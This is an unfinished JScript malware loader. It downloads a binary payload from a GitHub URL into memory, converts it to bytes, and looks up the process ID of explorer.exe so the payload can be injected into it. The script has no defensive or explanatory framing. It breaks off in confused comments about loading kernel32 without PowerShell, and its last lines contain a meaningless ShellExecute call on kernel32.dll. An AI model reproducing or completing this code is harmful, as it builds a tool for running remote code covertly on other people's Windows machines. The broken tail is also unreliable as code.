<script>
var url = "https://github.com/Spaggeheygewif/swuhhwd/raw/refs/heads/main/payload.bin";

// 1. Download payload.bin into memory
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET", url, false);
xhr.send();
var payload = xhr.responseBody; // VT_ARRAY | VT_UI1

// Convert to a byte array usable by Win32
var stream = new ActiveXObject("ADODB.Stream");
stream.Type = 1; // adTypeBinary
stream.Open();
stream.Write(payload);
var bytes = stream.Read(-1);
stream.Close();

// 2. Find explorer.exe PID
var wmi = GetObject("winmgmts:\\\\.\\root\\cimv2");
var procs = wmi.ExecQuery("SELECT ProcessId FROM Win32_Process WHERE Name='explorer.exe'");
var pid;
for (var e = new Enumerator(procs); !e.atEnd(); e.moveNext()) {
    pid = e.item().ProcessId;
    break;
}
if (!pid) {
    WScript.Echo("explorer.exe not found");
    WScript.Quit(1);
}

// 3. Win32 API declarations
var kernel32 = new ActiveXObject("Shell.Application").ShellExecute("kernel32.dll");
// Actually, we need to load kernel32 properly. Use a safer method:
var lib = new ActiveXObject("Scripting.FileSystemObject");
// Alternative: use "Unsafe" methods via Application.GetObject?
// Better: Use a technique with XMLHttpRequest and eval? No.
// Let's use a reliable approach: create a VBScript bridge or use .NET?
// But we cannot use PowerShell. We'll use plain JScript with WinRT? Not available.
